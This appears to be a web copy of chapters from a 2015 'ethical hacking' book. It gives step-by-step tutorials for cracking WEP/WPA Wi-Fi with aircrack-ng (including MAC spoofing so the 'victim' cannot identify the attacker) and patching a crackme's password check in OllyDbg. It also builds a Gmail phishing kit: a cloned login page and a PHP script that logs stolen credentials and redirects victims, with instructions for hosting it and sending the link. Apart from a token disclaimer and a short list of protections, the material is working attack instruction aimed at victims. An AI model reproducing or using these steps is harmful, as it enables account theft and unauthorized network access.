WPA2 TESTING - Hack-X-Crypt A Straight Forward Guide Towards Ethical Hacking And Cyber Security (2015)

Hack-X-Crypt A Straight Forward Guide Towards Ethical Hacking And Cyber Security (2015)



After performing the SQL injection, I can bet that now you have the endless curiosity to explore more about the ethical hacking. And as according to your need now in this article we are going to perform a hardcore hack using Backtrack Linux. we are going to learn that how to crack the WI-FI using Backtrack.one more thing I want to add here that all these stuff I am sharing with you is only for study purpose .if you have the black intentions just leave the book now. If you are performing this article on your computer, you will be responsible for any damage occurred by you.

So let’s start the article:

Now let us start with the Wi-Fi cracking. But before starting the tutorial let me give you a small introduction to what Wi-Fi hacking is and what is the security protocols associated with it.

In a secured wireless connected the data on internet is sent via encrypted packets. These packets are secured with network keys. There are basically 2 types of security keys:

WEP (Wireless Encryption Protocol):- This is the most basic form of encryption. This has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case many people still use this encryption.
WPA (WI-FI Protected Access) : This is the most secure wireless encryption. Cracking of such network requires use of a wordlist with common passwords. This is sort of brute force attack. This is virtually uncrackable if the network is secured with a strong password

So let’s begin the actual Wi-Fi Hacking tutorial! In order to crack Wi-Fi password, you require the following things:

For the Wi-Fi hacking you need to install the Backtrack on your computer.

I am assuming that you have already installed the Backtrack on your pc. If not it’s very easy to install by making bootable live CD/DVD. For installing processes you can just Google it. You will get it easily.

Now open the console from the taskbar, Click on the icon against the dragon like icon in the taskbar in the above screenshot.
You will have a Command Prompt like Shell called as console terminal.

1) Let's start by putting our wireless adapter in monitor mode. It allows us to see all of the wireless traffic that passes by us in the air. Type airmon-ng in the console terminal and press Enter. You will have a screen like this, note down the name of interface, in this case the name is wlan0.

2) Now type ifconfig wlan0 down and hit enter.

This command will disable your wireless adapter; we are doing this in order to change your MAC address.

Now, you need to hide your identity so that you will not be identified by the victim.to do this you need to type ifconfig wlan0 hw ether 00:11:22:33:44:55 and hit enter.

This command will change your MAC address to 00:11:22:33:44:55.
3) Now the next work is to type airmon-ng start wlan0 and press enter.

This will start the wireless adapter in monitor mode. Note down the new interface name, it could be eth0 or mon0 or something like that.

The above command in the console has started your network adapter in monitor mode as mon0:

4) Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.

This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID).
Let's do this by typing:

airodump-ng mon0

In the above screenshot there is a list of available networks, Choose 1 network and note the BSSID and channel of it.
5.) Type airodump-ng -c channel no –bssid BSSIDN1 mon0 -w filename and hit enter.

Replace channel no. and BSSIDN1 with the data from step 4. Replace the mon0 with network interface name from step 3. In place of filename write any name and do remember that. Better use filename itself.

This command will begin capturing the packets from the network. You need to capture more and more packets in order to crack the Wi-Fi password. This packet capturing is a slow process.

6.) To make the packet capturing faster, we will use another command. Open a new shell, don’t close the previous shell. In new shell type aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0 and hit enter.

Replace the BSSIDN1 with the data from step 4 and mon0 from step 3. This command will boost the data capturing process.
The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address and the command ends with your wireless adapters device name.

7.) Now wait for few minutes, let the DATA in the other console reach a count of 5000.

8.) After it reaches 5000, open another console and type aircrack-ng filename-01.cap and hit enter.
Replace the filename with the name you used in step 5. Add -01.cap to it. .cap is the extension of file having captured data packets. After typing this command, aircrack will start trying to crack the Wi-Fi password. If the encryption used is WEP, it will surely crack the password within few minutes.

In case of WPA use the following command instead of the above aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b BSSIDN1 filename-01.cap

Replace BSSIDN1 and filename with data you used. /pentest/wireless/aircrack-ng/test/password.lst is the address of a file having wordlist of popular passwords. In case of WPA aircrack will try to brute force the password. As I explained above that to crack WPA you need a file having passwords to crack the encryption. If you are lucky enough and the network owner is not smart enough, you will get the password.

For the prevention from being hacked you can refer to the chapter



Now-a-days people expect more than something with an application as it is provided by the developers. People want to use that specific application according to their own preferences. So now we are here with an article on the topic reverse engineering. Let’s start with simple engineering, “simple engineering” is the task to develop/build something BUT Reverse engineering refers to the task to redevelop/re-build something. In simple words reverse engineering is the task to modify the source code of the application to make it work according to our way, Reverse engineering is a very complicated topic and is very difficult to understand for beginners as it requires a prior knowledge of assembly language.

Developing is easy but to re-developing is not easy !!Because while development a programmer has to deal with the functions, pointers, conditions, loops etc… But while DE-compilation process we need to deal with registers !

Generally 32 bit / 64 bit windows supports mainly 9 registers: –

· Performing Registers
· ———————–
> EAX : Extended Accumulator Register

> EBX : Base Register
> ECX : Counter Register
> EDX : Data Register

· Index
· ———
> ESI : Source Index

> EDI : Destination Index

· Pointer
· ———–
> EBP : Base Pointer

> ESP : Stack Pointer
> EIP : Instruction Pointer
So , let’s move towards our way “How to modify the applications”
The general requirements you need for the modification are listed below and easily available on the internet: –

2.Crack Me App( click here to download)(register and activate your account before download)

· When you have downloaded both the apps ,first of all you need to launch the Crack Me App.
· It will ask you to enter the password, enter any password you want and hit on “OK”.

· Now it will show you the error that “You are not authorized to use the application”.

· Now open the OllyDBG and open the Crack me app in it.
· When you have opened the Crack me app in OllyDBG,now in the upper left box, while scrolling up you find the statement like this:– JE SHORT Password.00457728

· Basically, this is a conditional jump that means if the condition is true then it will jump to 00457728 Which shows us the message “You are not authorized to use the application” and if the condition is not true it just continues reading the code, So we don’t need this jump to work as we don’t want to get the error message.

· Now for removing the error message, we can change JE SHORT Password.00457728 to JNE SHORT Password.00457728, JNE(Jump If Not Equal) means that if the password is correct it will give you the error message and if the password is incorrect it will give you the correct message.

· For changing the query just double click the line JE SHORT Password.00457728 and simply change it to JNE SHORT Password.00457728 and Hit on “Assemble”.

· Now HIT on blue “PLAY” button in the upper side of the OllyDBG to start the Crack me app again and enter the password then it will give you the correct message.



What is phishing?

Phishing is an attempt by the sender to have the receiver of the email to release their personal information i.e. the attacker lures the victims to give some confidential information.

Why phishing?

There are many password cracking tools that are coming and going into/from the market. But phishing is the most efficient method to steal confidential information like, passwords, Credit card numbers, Bank account numbers etc.

How phishing works?

It works just like normal fishing.
A fisherman generally throws bait into the water to lure the fish. Then a fish comes to take the food feeling that it is legitimate. When it bites the bait, it will be caught by the hook. Now the fisherman pulls out the fish.

In the same way, the hacker sends a fake login page to the victim. The victim thinks that it is a legitimate one and enters his confidential information. Now the data will be with the hacker.
Now, let’s learn how to hack by phishing:
I am selecting Gmail account to be hacked by phishing.

For phishing you need the following stuffs:
· First of all you have to open the gamil.com by your browser and when page open completely ,just give a right click on the page and a dialogue box will opens after you having an option “view page source” in it.
·Clickon the “view page source” option and you see that the source code of that page will opens after you.
· Then press ctrl+F to open the text/word finding box.
·Type “action=” and replace it with anything.php
Such as “action=mail.php”
·Then find for the “method=” and also replace it with “get”. Such as method=”get”.

· Then save the file by anything.html Such as “Gmail.html”
·Then create a blank notepad file “log.txt”
· The again open the notepad and type the following codes:

header("Location: http://www.Gmail.com"); $handle = fopen("logs.txt", "a");
foreach($_GET as $variable => $value) { fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
fclose($handle); exit;

· Andsave it as “mail.php” (save this file by same name as you have replaced the “action=”)
· Now finally you have the three files which are required for the phishing.
· 1) Gmail.html (fake login page)
· 2) mail.php (to capture the login details)
· 3) log.txt (to store the captured details)

step1: create an account in any free web hosting site like www.bythost.com

step2: Now upload all the three files you have downloaded.(I have taken www.my3gb.com)
step 3: Give the link of the fake page to your victim.

eg: www.yoursitename.my3gb.com/Gmail.html
Step 4: when he clicks the link, it opens a fake Gmail page where he enters his login details. When he clicks sign in button, his login

details will be stored in log.txt file.
Here I have uploaded my scripts on to

www.my3gb.com And copy the Gmail.html link which you have to send the victim. i clicked the Gmail.html link
A fake page was opened where i entered my login details.

This page will looks exactly similar to the original Gmail login page. And when the victim enters his/her login details for logging in into his/her account.
Now, this time the victim will redirected to the original Gmail login website.
The victim will even don’t know that his/her account got hacked. Victim will think that the page gets reloaded due to internet errors or login mistakes etc.

Now his/her login details were captured by the php script and stored in log.txt file as shown in the figure below:

In the same way you can hack FACEBOOK accounts and other social networking accounts.
How to protect ourselves from phishing?
·Don’t use links
· Be suspicious of any e-mail with urgent requests
· By using secured websites
· Using efficient browsers · Using Antivirus or internet security software.